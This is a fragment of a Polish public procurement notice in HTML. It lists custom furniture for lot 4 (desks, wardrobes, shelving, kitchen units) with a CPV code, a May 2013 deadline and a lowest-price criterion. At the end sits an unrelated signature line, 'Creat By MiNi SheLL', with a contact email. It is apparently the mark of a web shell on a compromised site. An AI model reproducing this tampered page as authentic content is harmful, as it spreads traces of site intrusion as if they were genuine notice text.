<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Meble na wymiar.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BIURKO - 3 szt.
STOLIK OKOLICZNOŚCIOWY - 3 szt.
Szafa do zabudowy - 2 szt.
Szafa do zabudowy - 1 szt.
Szafa do zabudowy - 3 szt.
Stolik dziecięcy - 1 szt.
Regał  - 1 szt.
Regał  - 1 szt.
Regał  - 1 szt.
Regał  - 2 szt.
Regał  - 1szt.
Meble kuchenne - 1 kpl.
Meble kuchenne -1 kpl
Szafa dwudrzwiowa - 2 szt.
Wieszaki na ścianę - 2szt.
Ławka  - 1szt
Regał - 1szt
Lustro - 1szt
Szafka od lustro - 1szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com